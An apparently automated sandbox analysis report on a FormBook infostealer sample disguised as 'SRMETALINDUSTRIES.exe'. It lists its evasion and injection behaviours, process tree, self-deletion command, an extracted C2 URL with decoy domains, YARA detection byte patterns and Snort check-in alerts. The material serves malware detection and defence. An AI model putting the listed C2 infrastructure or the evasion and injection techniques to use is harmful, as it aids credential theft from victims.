Play interactive tour

Edit tour

Windows Analysis Report SRMETALINDUSTRIES.exe

Overview

General Information

Sample Name:	SRMETALINDUSTRIES.exe
Analysis ID:	483595
MD5:	51fb6f484b4bc554a7fddb7dc24c994e
SHA1:	6548d2e4c988457deb2a3435220f3252367462f3
SHA256:	4b9ec9143ae2471c8cf540f5e3815c4ca4bb5e073d5c45e6bd934cc0350e8546
Tags:	exexloader
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Sigma detected: Suspect Svchost Activity

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Self deletion via cmd delete

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Sigma detected: Suspicious Svchost Process

Queues an APC in another process (thread injection)

.NET source code contains very large strings

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

SRMETALINDUSTRIES.exe (PID: 6164 cmdline: 'C:\Users\user\Desktop\SRMETALINDUSTRIES.exe' MD5: 51FB6F484B4BC554A7FDDB7DC24C994E)

SRMETALINDUSTRIES.exe (PID: 1260 cmdline: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe MD5: 51FB6F484B4BC554A7FDDB7DC24C994E)

explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

svchost.exe (PID: 1972 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

cmd.exe (PID: 2456 cmdline: /c del 'C:\Users\user\Desktop\SRMETALINDUSTRIES.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nordicbatterybelt.net/n58i/"], "decoy": ["southerncircumstance.com", "mcsasco.com", "ifbrick.com", "societe-anonyme.net", "bantank.xyz", "dogecoin.beauty", "aboutacoffee.com", "babalandlordrealestate.com", "tintgta.com", "integrity.directory", "parwnr.icu", "poltishof.online", "stayandstyle.com", "ickjeame.xyz", "currentmotors.ca", "pond.fund", "petrosterzis.com", "deadbydaylightpoints.com", "hotel-balzac.paris", "focusmaintainance.com", "odeonmarket.com", "voeran.net", "lookailpop.xyz", "sashaignatenko.com", "royalgreenvillage.com", "airbhouse.com", "zl-dz.com", "fuwuxz.com", "wugupihuhepop.xyz", "zmdhysm.com", "luchin.site", "rnchaincvkbip.xyz", "fffddfrfqffrtgthhhbhffgfr.com", "goabbasoon.info", "booyahbucks.com", "ilovecoventry.com", "components-electronics.com", "advindustry.com", "browandline.com", "hotnspicy.site", "marlonj26.com", "holidays24.net", "starworks.online", "mbchaindogbbc.xyz", "3wouqg.com", "evnfreesx.com", "baureihe51.com", "hycelassetmanagement.space", "photostickomni-trendyfinds.com", "singisa4letterword.com", "thklw.online", "menramen.com", "highspeedinternetinc.com", "beerenhunger.info", "hisensor.world", "lassurancevalence.com", "clementchanlab.com", "customia.xyz", "alysvera-centroestetico.com", "cx-xiezuo.com", "index-mp3.com", "mybenefits51.com", "vyhozoi.site", "lingerista.net"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.611035350.0000000000E30000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.611035350.0000000000E30000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.611035350.0000000000E30000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.422353517.0000000000F00000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.422353517.0000000000F00000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.422353517.0000000000F00000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.610962252.0000000000E00000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.610962252.0000000000E00000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.610962252.0000000000E00000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.386735863.0000000007648000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.386735863.0000000007648000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.386735863.0000000007648000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.356803030.0000000002802000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000000.401938701.0000000007648000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.401938701.0000000007648000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.401938701.0000000007648000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.422322216.0000000000ED0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.422322216.0000000000ED0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.422322216.0000000000ED0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.357083874.00000000037F9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.357083874.00000000037F9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85830:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x85bca:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xad650:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xad9ea:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x918dd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xb96fd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x913c9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xb91e9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x919df:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xb97ff:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x91b57:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb9977:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x865e2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xae402:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x90644:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb8464:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8735a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xaf17a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x96dcf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xbebef:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x97e72:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.357083874.00000000037F9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x93d01:$sqlite3step: 68 34 1C 7B E1 0x93e14:$sqlite3step: 68 34 1C 7B E1 0xbbb21:$sqlite3step: 68 34 1C 7B E1 0xbbc34:$sqlite3step: 68 34 1C 7B E1 0x93d30:$sqlite3text: 68 38 2A 90 C5 0x93e55:$sqlite3text: 68 38 2A 90 C5 0xbbb50:$sqlite3text: 68 38 2A 90 C5 0xbbc75:$sqlite3text: 68 38 2A 90 C5 0x93d43:$sqlite3blob: 68 53 D8 7F 8C 0x93e6b:$sqlite3blob: 68 53 D8 7F 8C 0xbbb63:$sqlite3blob: 68 53 D8 7F 8C 0xbbc8b:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: SRMETALINDUSTRIES.exe PID: 6164	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.SRMETALINDUSTRIES.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.SRMETALINDUSTRIES.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.SRMETALINDUSTRIES.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
4.2.SRMETALINDUSTRIES.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.SRMETALINDUSTRIES.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.SRMETALINDUSTRIES.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity

Show sources

Source: Process started

Author: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1972

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1972

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1972

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000009.00000002.611035350.0000000000E30000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.nordicbatterybelt.net/n58i/"], "decoy": ["southerncircumstance.com", "mcsasco.com", "ifbrick.com", "societe-anonyme.net", "bantank.xyz", "dogecoin.beauty", "aboutacoffee.com", "babalandlordrealestate.com", "tintgta.com", "integrity.directory", "parwnr.icu", "poltishof.online", "stayandstyle.com", "ickjeame.xyz", "currentmotors.ca", "pond.fund", "petrosterzis.com", "deadbydaylightpoints.com", "hotel-balzac.paris", "focusmaintainance.com", "odeonmarket.com", "voeran.net", "lookailpop.xyz", "sashaignatenko.com", "royalgreenvillage.com", "airbhouse.com", "zl-dz.com", "fuwuxz.com", "wugupihuhepop.xyz", "zmdhysm.com", "luchin.site", "rnchaincvkbip.xyz", "fffddfrfqffrtgthhhbhffgfr.com", "goabbasoon.info", "booyahbucks.com", "ilovecoventry.com", "components-electronics.com", "advindustry.com", "browandline.com", "hotnspicy.site", "marlonj26.com", "holidays24.net", "starworks.online", "mbchaindogbbc.xyz", "3wouqg.com", "evnfreesx.com", "baureihe51.com", "hycelassetmanagement.space", "photostickomni-trendyfinds.com", "singisa4letterword.com", "thklw.online", "menramen.com", "highspeedinternetinc.com", "beerenhunger.info", "hisensor.world", "lassurancevalence.com", "clementchanlab.com", "customia.xyz", "alysvera-centroestetico.com", "cx-xiezuo.com", "index-mp3.com", "mybenefits51.com", "vyhozoi.site", "lingerista.net"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SRMETALINDUSTRIES.exe

ReversingLabs: Detection: 20%

Yara detected FormBook

Show sources

Source: Yara match	File source: 4.2.SRMETALINDUSTRIES.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.SRMETALINDUSTRIES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.611035350.0000000000E30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.422353517.0000000000F00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.610962252.0000000000E00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.386735863.0000000007648000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.401938701.0000000007648000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.422322216.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357083874.00000000037F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: SRMETALINDUSTRIES.exe

Joe Sandbox ML: detected

Source: 4.2.SRMETALINDUSTRIES.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: SRMETALINDUSTRIES.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: SRMETALINDUSTRIES.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: SRMETALINDUSTRIES.exe, 00000004.00000002.423283417.000000000149F000.00000040.00000001.sdmp, svchost.exe, 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: SRMETALINDUSTRIES.exe, 00000004.00000002.423283417.000000000149F000.00000040.00000001.sdmp, svchost.exe
Source:	Binary string: svchost.pdb source: SRMETALINDUSTRIES.exe, 00000004.00000002.424002139.0000000001800000.00000040.00020000.sdmp
Source:	Binary string: svchost.pdbUGP source: SRMETALINDUSTRIES.exe, 00000004.00000002.424002139.0000000001800000.00000040.00020000.sdmp

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4x nop then pop edi	4_2_0041625A
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4x nop then pop edi	4_2_0040C3D2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then pop edi	9_2_005A625A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then pop edi	9_2_0059C3D2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49815 -> 44.227.65.245:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49815 -> 44.227.65.245:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49815 -> 44.227.65.245:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.hisensor.world
Source: C:\Windows\explorer.exe	Domain query: www.integrity.directory
Source: C:\Windows\explorer.exe	Network Connect: 13.250.255.10 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.sashaignatenko.com
